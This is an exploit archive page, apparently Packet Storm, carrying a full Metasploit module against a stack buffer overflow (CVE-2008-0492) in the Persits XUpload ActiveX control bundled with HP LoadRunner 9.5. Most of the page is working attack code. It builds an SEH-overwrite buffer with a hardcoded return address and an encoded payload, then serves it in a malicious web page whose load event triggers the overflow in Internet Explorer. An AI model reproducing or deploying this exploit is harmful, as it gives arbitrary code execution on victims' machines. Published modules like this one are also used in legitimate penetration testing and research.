exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Persits XUpload ActiveX AddFile Buffer Overflow

Persits XUpload ActiveX AddFile Buffer Overflow
Posted Dec 31, 2009
Authored by jduck | Site metasploit.com

This Metasploit module exploits a stack overflow in Persits Software Inc's XUpload ActiveX control(version 3.0.0.3) thats included in HP LoadRunner 9.5. By passing an overly long string to the AddFile method, an attacker may be able to execute arbitrary code.

tags | exploit, overflow, arbitrary, activex
advisories | CVE-2008-0492
SHA-256 | 089d6eb19898145a2a56800a1257447d897fce5f0c907c70b9222faf98dfc7db

Persits XUpload ActiveX AddFile Buffer Overflow

Change Mirror Download
##
# $Id: hp_loadrunner_addfile.rb 7724 2009-12-06 05:50:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::Seh

def initialize(info = {})
super(update_info(info,
'Name' => 'Persits XUpload ActiveX AddFile Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in Persits Software Inc's
XUpload ActiveX control(version 3.0.0.3) thats included in HP LoadRunner 9.5.
By passing an overly long string to the AddFile method, an attacker may be
able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'jduck' ],
'Version' => '$Revision: 7724 $',
'References' =>
[
[ 'CVE', '2008-0492'],
[ 'OSVDB', '40762'],
[ 'BID', '27456' ],
[ 'URL', 'http://www.milw0rm.com/exploits/4987' ],
[ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/059296.html' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'XUpload.ocx 3.0.0.3 on Windows XP SP3 / IE6 SP3',
{
'Ret' => 0x10019d6e # pop/pop/ret @ XUpload.ocx
}
],
],
'DisclosureDate' => 'Jan 25 2008',
'DefaultTarget' => 0))
end

def autofilter
false
end

def check_dependencies
use_zlib
end

def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)

# Randomize some things
vname = rand_text_alpha(rand(100) + 1)
strname = rand_text_alpha(rand(100) + 1)

# Set the exploit buffer
sploit = rand_text_alpha(738)
sploit << generate_seh_payload(target.ret)
sploit << p.encoded
sploit << rand_text(1000) * 25
sploit = Rex::Text.to_unescape(sploit)

# Build out the message
content = %Q|<html>
<script language='javascript'>
function check()
{
#{strname} = new String(unescape("#{sploit}"));
#{vname}.AddFile(#{strname});
}
</script>
<body onload='javascript:check()'>
<object classid='clsid:E87F6C8E-16C0-11D3-BEF7-009027438003' id='#{vname}'></object>
</body>
</html>
|

print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

# Transmit the response to the client
send_response_html(cli, content)

# Handle the payload
handler(cli)
end

end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close